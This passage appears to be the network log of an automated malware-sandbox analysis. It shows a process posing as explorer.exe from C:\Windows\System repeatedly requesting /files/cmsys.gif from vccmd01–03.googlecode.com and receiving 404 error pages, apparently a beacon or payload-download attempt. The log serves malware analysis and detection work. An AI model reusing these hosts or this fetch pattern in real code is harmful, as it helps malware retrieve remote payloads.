                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:22.244843006 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    36192.168.2.560674108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:22.616269112 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:23.560825109 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:23 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:23.561069965 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    37192.168.2.560675142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:23.943504095 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.050404072 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:24 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.050425053 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.051271915 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    38192.168.2.56067764.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:27.312540054 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:28.267769098 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:28 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:28.267807961 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    39192.168.2.560678108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:28.540689945 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:29.496773005 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:29 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:29.496793032 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    40192.168.2.560679142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:29.789535046 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:30.713148117 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:30 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:30.713176966 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    41192.168.2.56068164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:32.649677992 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:33.575355053 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:33 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:33.575586081 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    42192.168.2.560682108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:33.788289070 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:34.741954088 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:34 GMT
